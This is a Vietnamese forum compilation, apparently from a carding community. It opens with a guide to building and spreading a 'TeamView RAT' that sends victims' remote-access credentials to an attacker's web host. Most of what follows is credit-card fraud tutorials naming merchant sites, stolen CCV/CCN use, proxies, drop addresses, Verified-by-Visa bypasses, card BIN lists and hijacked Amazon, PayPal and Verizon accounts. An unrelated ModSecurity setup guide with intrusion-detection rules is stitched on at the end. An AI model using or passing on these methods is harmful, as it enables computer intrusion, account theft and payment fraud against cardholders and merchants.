XÂM NHẬP MÁY TÍNH = TEAMVIEW RAT

Hôm nay, cụ thể là sáng nay.
sau khi đã test thành công Phần mềm này thì Ljz đã làm cái hướng dẫn nhỏ cho anh em tham khảo phần mềm này !
vì sử dụng nó cũng rất đơn giản nên chẳng cần phải việt hóa làm gì !

Ai lo lắng phần mềm này nó có cái gì đó thì cứ ra net mà bug rồi gửi cho victim . song cứ về nhà mà chờ info !
kẻ thì làm trên máy nhà, không AV , mà cũng k lo ( k biết có đồng chí nào đang xem kẻ online k nữa )  ! ( nếu có bác tha em nhé  )

Download Teamview Rat

 http://www.mediafire.com/?a4m7s2gr4o2rx08
 Pass: nbvn.us

Hướng dẫn cụ thể như sau :

1. không nói nhiềum ở đây mình dùng 000webhost để chứa file info log vào máy tính victim mà file rat gửi về ( các bạn có thể xài host khác. nhưng mình thấy xài 000webhost là đơn giản, nhanh, gọn )

2. khi đã cả 2 thứ là hosting và phần mềm TeamView Rat thì các bạn làm theo hình.

3. login vào hosting để lấy thông tin tạo file Rat

Chú Ý: 
+ở ô CLAVE DE ACCESO : 123456 << 123456 ở đây là mật khẩu nhất định khi nhận được info victim từ file rat. chúng ta cứ để nguyên. chẳng cần thay đổi làm gì ! 
+password là password bạn đăng nhập vào hosting 

4.sau khi đã nhập xong thông tin. giờ ta bug file Rat








Có được file Rat. việc tiếp theo là ta phải dụ victim click vào file này  .
( việc này do các bạn giải quyết nhé, đưa cho người iêu trước xem thế nào , biết đâu nó đang chat chit vs thằng nào thì ta còn quán triệt được  )

5. Để xem info login máy tính victim đc gửi về từ file Rat, ta làm như sau :
  





==============================================
sau khi lgoin ta được !



Giờ có quyền điều khiển victim trong tay ! việc tiếp theo tùy vào các bạn !
vì nó có thể xâm nhập và lấy được dữ liệu từ ổ nhớ victim nên mình khuyên các bạn nên thận trọng. !
không nên dùng vào việc xấu nhé !
cái này mang tính chất tham khảo !

Ipad3 = The new ipad 2012

ship: drop aus

sock: 5sock.net, sock aus

cc: aus ko cần pass, cc bình thường, gấu dùng debit aus

track: xem trong ảnh

deli: nhìn trong ảnh tính số ngày nhé.

Nếu order có nghi ngờ, shop bắt chuyển tiền vào bank

Vic: expansys.com.au

Gift AMZ pay site trung gian

nguyên liệu chiến em nó
vì là site trung gian nên mình phải reg acc ở site nó 1 tháng mất hơn 3$ gì đấy dùng ccv cùi là qua.
check mail pass lấy acc amz có add card
vào site nó tạo 1 acc rồi chọn gift amz, gift cao nhất là 100$ thôi nha
tiếp theo nó chuyển đến site amz lấy mail pass check được log vào pay qua thôi
cái này phải chờ 1 ngày mới nhận được gift
proof cho anh em tự tin chiến

Site: http://bluemountain.com

[CCV] Ship Alienware m18x - Drop.

Đầu tiên, cám ơn anh chị em đã dành thời gian đọc qua Topic này của mình.
Và để không vòng vo, mình đi thẳng luôn vào vấn đề.

Để hiểu rỏ hơn những từ ngữ - thủ thuật trong Tut này, đề nghị anh em tham khảo thêm các tài liệu về: AVS/Charge accept/VBV [hoặc MCSC] bypass &Enroll.

Đề nghị anh em đọc thật kỹ các chỉ định nói trên trước khi hùng hồn phán xét

Victim:

http://www.tigerdirect.com/applicati...177&CatId=4938

How to?

1. Clear sạch cookies, cũng như là Flash player cookies [details]
=> Chẳng có gì là tự nhiên, không lý do cả. Chắc mẵm 10 bạn đọc được site Victim thì sẽ vào ngay => cookies clear đi chăng nửa, thì cũng không thể quá 1/2 số trường hợp như trên quan tâm hoặc biết đến chuyện clear Flash cookies.
2. Fake socks multilayer.
=> Nếu như dùng Socks thì store hoặc proccessor đã quá quen mặt với những range socks đại trà, phổ thông. Có nhiều bạn vẫn quan niệm rằng, cứ phải socks trùng state thì sẽ giúp cho proccess tin tưởng hơn. Mình không phủ nhận quan niệm đó, nhưng ở đã là ở Mỹ, thì việc khác IP so với billing chẳng có nghĩa lý gì cả. Lan man quá nhỉ? thôi, ngắn gọn lại: Sử dụng VPN hoặc SSH (lưu ý cẩn thận với SSH, vì có thể bị detect ra Hosting provider).
3. Sử dụng e-mail có Tài khoản đã đăng ký tại Tigerdirect, hoặc tốt hơn là đã có successful order/transaction
4. V/v sử dụng CCV, thì mỗi người mỗi ý. Theo cách của mình thì:
a. Sử dụng CCV cho phép kích hoạt VBV với những info có sẵn, đơn giản, dễ tìm
b. Sử dụng CCV không hổ trợ / liên kết với Verified by Visa (MCSC cũng vậy)
5. Bill = SHIP [fake name]. Còn nếu view được list BIN dưới thì cứ BILL # SHIP, thích thì BILL = SHIP = DROP cũng OK
Lưu ý: Active/Enroll/Release password VBV trước tại đây
Tại sao: vì một lần vô tình sử dụng pop-up blocker, mình phát hiện ra nếu như tại step VBV, bạn click Cancel hoặc Active later (đối với bypass VBV), hoặc fake 4 digit SSN (ex: 0000) => hiện pop-up => high fraud => tỷ lệ led cao hơn.




BILL = SHIP = DROP (CCV US nhé)



T.I.P.S:
1. Giờ giấc không quan trọng, nhưng đừng chat với support department.
2. Không sử dụng IP khác country khi kiểm tra order status.
3. Track thì có nhiều carrier, cứ chọn fastest track mà làm. Em này không như Newegg, cũng chưa có tiền lệ về kill drop.
4. Place order mà bị đề nghị cung cấp SSN thì LED gần như 40%, nhưng cứ bình tỉnh, có thể drop của bạn có SSN.

HTC phone, DSLR, camera, ipod (hàng ngọt)

Nói đúng hơn TUT này của LenoPark là tut vượt qua 1 paygate rất chi là lớn :3: từ paygate này anh em có thể tìm ra rất nhiều shop electronic , quần áo giầy dép ... tất tần tật những thứ mình cần

Và để bắt đầu thì chúng ta cần có những công cụ nhé :

Trước tiên : hãy châm 1 điếu thuốc và nghe 1 bản nhạc kèm theo 1 cốc trà đá ( nóng tùy ý )

Site paygate : www.INTERNATIONALCHECKOUT.COM từ site này a e có thể tìm trong đó rât nhiều các site như tiêu đề đã nêu

sock : Sock = US nhưng phải clear PP nhé . Không clear thì đối với 1 số shop thì nó ko cho vào shop đâu ( Vì Leno dùng cc us nên xài sock US )

CC : CCV . ( visa pass VBV , Master pass MSC )

12:52 AM

có cái TUT mà site bảo trỳ mẹ rồi

[ sell ebay - ccn ]máy sấy,máy ép tóc ....

victim : http://www.folica.com/

ccn us live đủ balance nhé
sock: us là đc
time : trừ thứ 7 cn
mail : nhận đc là đc
order bất cứ lúc nào 5h-6h sáng là có track
ship nhanh cực kỳ luôn.

Ship macbook pro = CCN

Site: cdw.com

[CCV] Ship ipod to drop

Victim: http://qvc.com
Nguyên liệu: ccv 3 4 5
Socks trùng bang Drop
Bill = Ship
Tối đâm chiều ngày hôm sau có track.


Prof


Track đây: 1Z1816091303139067 

Ship Điện thoại dành cho người già và trẻ nhỏ

1, victim: http://just5.com/

2, socks: trùng states.

3, cc: ccn - có check avs (all type) (charge là ok).

4, add: bill # ship (direct or nhầm nước).

5, tracking: via FedEx.

The END.

Good Luck!

Support by hclvnw

[CCN] Perfume to drop US

-Victim: 6pm.com

-Order: b#s

-Sock trùng state bill

shipped iphone4s (iluv.apple)

Hidden Block (6 post(s) are required, you have 6):

ship to drop, name trùng name cc
sock: 5sock, sock trùng state drop
ccv: ccv inter non infor (dòng eu pass vbv); ccv inter aus pass vbv, riêng với ccv us cũng dùng đc, nhưng hơi phức tạp hơn 1 chút, nếu dùng ccv us thì phải chọn loại pass vbv và account phải trùng state drop mình ship
site: verizonwireless.com
CÁI CẦN NHẤT LÀ: account verizon, account phải live, ko locked, ko die. Phải nhờ ai đó share hoặc code cho cái site check account verizon, vì thường chỉ có check acc itunes, amz, ebay v.v....

Cách làm:
loggin account đã check đc, vào đc account thì ấn "update device". Sau đó bạn chọn loại máy bạn muốn. Ở đây gấu chọn ip4s white 32 gb. Chọn tiếp loại "month to month", nhớ gỡ bỏ cái "2 years contact" nhé  Mình sẽ mua đứt luôn mà 
Sau đó cứ next thôi, cái nào nó bắt phải chọn thì chọn đại mấy thứ rẻ nhất ý, chọn data cũng chọn loại phí thấp nhất.
Đến đoạn điền infor. Vì do ship apple, nên bill buộc phải = ship. Các bạn xóa hết infor chủ account đi, chỉ giữ lại sdt thôi nhé, còn đâu edit sang infor drop mình hết, nhớ là name cc và add drop nhé 
sau đó ấn next là tới payment, trong trường hợp ấn next báo lỗi đỏ, thì ấn 3 -5 lần là sẽ pass.
Phần cuối là điền cc numbers, cvv2, zipcode drop và ấn continue. Nếu cc pass thật sự, nó sẽ ko bắt verify password, vì nhiều site giờ tuy check pass vbv nhưng chưa chắc đã chuẩn đâu. Gấu đã test nhiều lần, dù pass nhưng ném vào đây vẫn bắt veri password đó. Vì thế tiêu chí như cc ở trên các bạn nhớ lưu ý 
Nếu order tầm sáng đến chiều, thì tầm 9h43' tối sẽ có track. Còn nếu order tầm hơn 1h sáng thì 5h15' am sẽ có track.
Track fedex nhé, có nhiều loại cho các bạn lựa chọn, cứ chọn loại Fedex saturday 19$ ý, nếu ko có thì chọn loại over9 14$, cái này tùy thuộc các account chủ thẻ đăng ký 

pub 1 số ảnh để mọi ng dễ soi, dễ ship. Gấu ăn no và nghỉ dưỡng đến hết năm nên cũng ko còn mặn mà với dòng apple nữa, hj hj 

[SHIPPED]LAP,PHONE,ELECT v.v.... China

+Link : Ecomelectronics.com

+IP:

-IPVN => Thì bắt ver nhưng không sao cứ đến ngày ship vẫn cứ ship

-IPUS => Không Ver Nhưng tỉ lệ hold tiền cũng khủng

+CCN : Have balance (hàng của triệufudn vứt đâm bừa )

Chơi bill=ship

VPS LINUX WINDOWN các loại

- Sock us 
- CCV 
- Victim: ucvhost.com
- 5 tiếng có info.
- Proof:

Sau 5h nhận info thì đợi 1h nữa, nếu có mail led là die còn không là live mãn hạn tù

[WORLDPAY] từ dép tông tới Macbook

Tình hình là lâu rồi k hoạt động.
hôm qua bị trừ 300Thank.
Hôm nay lại còn về màu trắng.
Rảnh rổi ngồi làm cái tut cho cã newbie lẫn bro chơi vui.
chắc chắn tut không nát nên sẻ không hide.
nhưng ai leech bài thì làm ơn ghi rỏ XuChieng - DF
Notice: đây chỉ là kinh ngiệm cá nhân. làm ơn đừng CM đau tai

Vấn đề thứ 1:
Như tiêu đề thì đây là tut về gate Worldpay.
Với mình thì gate Worldpay chưa return bao giờ.nhưng 1 số bạn thì bị return thường xuyên. để tránh return các bạn nên chơi vào buổi sáng từ thứ 2 tới thứ 6.

Vấn đề thứ 2:
site nào có gate WP ?
Nếu các bạn muốn đồng hồ hay áo quần hay cã Macbook và cell phone củng đc.
Vào google search: "thứ cần tìm" by worldpay
90% site gate worlpay cho về asia ( ship dr or nhầm ). còn drop thì miễn bàn.

Vấn đề thứ 3:
gate Worldpay có 2 kiểu.
+ kiểu đầu tiên là WP có cho thêm Amex:

+Kiểu thứ 2 là kiểu không cho Amex:

Vấn đề 4:
Chung: IP VN. mail tùm lum (mình chơi mail domain quen rồi.)

+ Với gate kiểu 1 ( cho amex ) thì nguyên liệu và cách thức như sau:
CC: amex - visa - master. loại nào củng đc.không cần pass vbv
Điền = copy và pate. ( không gỏ tay )
-> MAKE PAYMENT và đừg chọn gì nữa cã.để gate tự load.
Nếu bắt ver pass thì chọn Cancel.(qua tốt)

+ với gate kiểu 2 ( k cho amex) thì như sau:
CC visa + master pass.
điền info = tay (kể cả cc num)
-> MAKE PAYMENT và đừg chọn gì nữa cã.để gate tự load.
Nếu bắt ver pass thì cứ cancel và -> led.
không sao. lấy cc khác chơi.
gate worldpay k giới hạn. ( có khi mình dùng tới con thứ 15-16 gì vẫn qua)

Mình order hnay là sáng thứ 7 nên shop nó nghỉ rồi thì phải.
đợi nãy giờ chưa có track. thôi cứ up lên đã.
update mail track sau nhé các tình yêu.

Demo phát nhỉ?

vào google gỏ: clothing by worldpay

Chơi thằng Chunkclothing nhé. đang thích mấy cái áo ở đó.

order và đến gate:

->>>>> gate dạng 1 ( cho amex )

->>>> make payment

và thêm 2 cái mail:

bypass confirm bank card + ver phone paypal

Để bypass confirm bank card + ver phone thì ta dùng mobile.paypal.com để pay thì sẽ ko dính vì wap cho paypal ko có chức năng confirm bank card vs phone
1. AE down soft giả lập java ver eng http://www.mediafire.com/?lb82f4p4fb3yspx
pass 123456
2.ver viet http://www.mediafire.com/?fefeq67aa0eyl1k
Pass install: gocmobile
down http://zingme.us/84396 opera
vao gia lap chon tep .jar 
paypal.com thang tien log no SM pay thoai mai ko confirm

[CCV] Topup 50k......

Site: www.aryty.com

Nguyên liệu:

CCV: live

Socks ngon, trùng State (trùng city càng tốt)

Số đt US để verify sms của nó (cái này các bạn vào http://sonetel.com reg nhé)

xem State của CCV rồi reg cho phù hợp

Xong rồi đó, giờ thì chiến thôi, site của em nó đây

Nó cho top tới 300k, nhưng top về VN thì tối đa có 50k thôi

Bác nào có cách top đc 300k thì bổ sung nhé

Vì là nơi cho ae kiếm thêm tí cháo nên mình hide 3 tránh nát nhé, vài ngày sau sẽ hạ

Chúc ae ngon miệng và top cho gái thật nhiều rồi hốt hàng thật sung

Key Game Diablo 3 Chống Die

Site: hotcdkey.com <~ Thanks Phanh Gay Đã Post Site 
PG: CVV đủ xiền là qua
Ver qua phone nhé các bạn
Tips: mấy bạn ko cần nghe đâu như cho cái phone skype vô cho nó gọi ko được sau 1 ngày nó sẽ send key cho các

Khỵ đã add key vô acc ok 
Lưu ý mấy bẹn buy digital bị sus mang key vô add là ok nhá mấy bạn acc còn live thì ko add được đâu 
chúc các bạn thành công chơi game ko bị lock

[CCV] Ship hang elect china...

Nguyên liệu CCV,, CNN chưa thử

Sock US, live speed

Mail: yahoo cho lẹ

time thì thích phăng

bin thì em sưu tầm từ các pro

529149,546632,438864,537170,546632, 464467, 4170210

464467 EAST WEST BANK

417021 JPMORGAN CHASE BANK

432780 INEZ DEPOSIT BANK

CAPITAL ONE BANK

FIA CARD SERVICES, NA

CARD SERVICES FOR C.U.S, INC.(ccv create pass)

CASHMERE VALLEY BANK (ccv create pass)

SOVEREIGN BANK 

Pro nhìu vl

http://www.eforchina.com

[CCV] Ipad3 = The new ipad 2012

[CCN] Ipad mbp laptop...

Pub ra cho nhanh thấy.đỡ ăn ban  Site này chắc hết hôm nay là nát  
victim: www.yo-no.com
cc thỳ xài loại nào cũng đk ccv hay ccn (nếu ccn thỳ đánh dấu tích vào cai cạnh cvv)
time 7h tối đến 3h sáng (lúc đấy nó làm việc nhanh)
thank you thỳ 70% ped còn lại phụ thuộc vào con chủ thẻ
sock us trùng state chủ thẻ hoặc drop .
Nếu ship ipad thỳ sau 1 ngày nó send mail hỏi chọn mạng nào để nó đăng ký......
proof:
http://khoc.vn/?v=Kvji.png
track đã deli
http://www.packagetrackr.com/track/1Z3496E70327465774

Hướng dẫn setup ModSecurity trên CentOS 29 Aug Install mod_security

1. install lib

yum install httpd-devel libxml2-devel pcre-devel apr-devel apr-util-devel curl-devel -y

2. Download and install mod_security

cd /tmp
wget http://ncu.dl.sourceforge.net/project/mod-security/modsecurity-apache/2.6.3/modsecurity-apache_2.6.3.tar.gz
tar xzvf modsecurity-apache_2.6.3.tar.gz
cd ./modsecurity-apache_2.6.3
./configure
make && make install
cp /usr/local/modsecurity/lib/mod_security2.so /etc/httpd/modules

Hoặc là :
cp /usr/local/modsecurity/lib/mod_security2.so /usr/local/apache2/modules

3. check loadmodule in httpd.conf

LoadModule unique_id_module modules/mod_unique_id.so

4. Add lines to file httpd.conf (/etc/httpd/httpd.conf or /usr/local/apache2/conf/httpd.conf )

LoadFile /usr/lib64/libxml2.so
LoadModule security2_module modules/mod_security2.so

5. Creat config file for mod_security and Include in httpd.conf

touch /etc/httpd/conf.d/modsecurity.conf

6. reload apache

service httpd restart

I-Khái niệm tổng thể về MS:
Dựa trên hình vẽ các bạn có thể dễ dàng nhận thấy MS là một tường lửa mức ứng dụng. Đứng trước Webserver và có khả năng xử lý traffic trước khi đưa vào Webserver. Mọi yêu cầu gửi đến Webserver từ phía client sẻ được gửi qua modsecurity.
Module mod_security là một module mạnh mẽ. Kết hợp với các luật được định nghĩa, bạn có thể chặn nhiều lỗ hổng của máy chủ được mở ra do việc viết mã php hay perl không tốt.
Modsecurity có thể :
- Theo dõi HTTP traffic để phát hiện những dấu hiệu bất thường.
- Lọc các dữ liệu ra vào webserver.
- Ghi lại các tương tác giữa client và webserver.
- And more ….
Modsecurity hoạt động dựa trên các rules. MS có hoạt động hiệu qua hay không phụ thuộc rất lớn vào khả năng thiết lập rule của người quản trị.

II-Cài đặt và cấu hình:
Phiên bản dùng để DEMO là mod_security2.5.2 trên CentOS.Các bạn có thể áp dụng các command này đối với Fedora hay Redhat…
Đầu tiên bạn cần cài đặt apache2. Rất đơn giản bằng cách sử dụng câu lệnh sau:

Code:

yum -y install httpd*

Cài đặt các gói yêu cầu:

Một vài module cần thiết phải được cài đặt để chuẩn bị cho việc cài đặt mod_security. Hãy cài những gói sau:

Code:

yum –y install libxml2* pcre* curl* gcc.i386 gcc-c++.i386

Download mã nguồn MS:

Code:

wget http://www.modsecurity.org/download/modsecurity-apache_2.5.12.tar.gz

Giải nén gói MS

Code:

tar -vxzf modsecurity-apache_2.5.12.tar.gz

Setup MS

Code:

[root@dhcppc1 ~]# cd modsecurity-apache_2.5.12/apache2/
[root@dhcppc1 apache2]# ls
[root@dhcppc1 apache2]# ./configure
[root@dhcppc1 apache2]#make

Sau khi biên dịch thành công file mod_security2.so sẽ được tạo ra trong thư mục .libs.
Tích hợp MS vào Apache
Để Apache nhận ra sự tồn tại của MS chúng ta cần copy mod_security2.so đến thư mục chứa modules của apache.
đối với centos là /etc/httpd/modules :

Code:

cp .libs/mod_security2.so /etc/httpd/modules/

và sửa lại file httpd.conf để load module bằng cách thêm vào httpd.conf dòng

Code:

nano /etc/httpd/conf/httpd.conf

Thêm vào dòng :

LoadModule security2_module modules/mod_security2.so

File cấu hình MS

Để sử dụng mod_security bạn phải cấu hình cho nó( cái này tùy vào mỗi hệ thống mà sẽ dẫn đến những cấu hình khác nhau). Trước tiên bạn mở file httpd.conf ra và thêm vào dòng sau:

Code:

<IfModule mod_security.c>
# cấu hình cho mod_security
</IfModule>

hoặc bạn có thể tạo riêng một file là modsecurity.conf trong thư mục conf của apache và include nó từ file cấu hình của apache httpd.conf:

dùng lệnh
nano /etc/httpd/conf/httpd.conf
mở file httpd.conf chèn đoạn sau vào cuối cùng để load file modsecurity.conf sẽ tạo ra.

Code:

<IfModule mod_security.c>
include conf/modsecurity.conf
</IfModule>

Sau khi cài đặt mặc định bộ máy filtering sẽ disable ( muốn dùng mod_security chúng ta phải bật nó lên).

Ban chỉ việc thêm vào dòng sau trong file modsecurity.conf:
SecFilterEngine On ( or Off , DynamicOnly )
Sau đây là cách cấu hình cho mod_security để hạn chế những kiểu tấn công cơ bản:
tạo file : nano /etc/httpd/conf/modsecurity.conf
chèn vào nội dung :

Code:

SecFilter xp_regdeletekey
#chống spam mail
<Location /cgi-bin/FormMail>
SecFilterSelective "ARG_recipient" "!@modsecurity.org$"
</Location>
#phát hiện xâm nhập
SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid=("
#Nếu muốn ghi lại log
SecAuditLog logs/audit.log
SecFilterDebugLog logs/modsec.log
SecFilterDebugLevel 0
#Muốn mod_security phân tích POST request, dùng:
SecFilterScanPOST On

# để mod_security *kiểm tra* URL encoding và UTF-8.
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding On

Lưu ý:Nếu bạn dùng SecFilterCheckUnicodeEncoding On, một số bộ gõ hay input tiếng Việt sẽ không hoạt động, một số bộ gõ hay input tiếng Việt sẽ không hoạt động
Nếu bạn chạy web với nhiều virtualhost và muốn một site trong nhiều sites không dùng mod_security, bạn có thể dùng:
SecFilterSelective SERVERNAME “^tên_của_web_site$” nolog,allow

Trên đây chỉ là vài cấu hình cơ bản,Còn rất nhiều kiểu cấu hình mà mình không đề cập đến các bạn tìm hiểu thêm trong quyển EBOOK modsecurity này nhé: http://www.mediafire.com/?ylmmudgjmzm (tùy thuộc vào hệ thống của bạn mà có cấu hình cho thích hợp).
Chúc bạn thành công.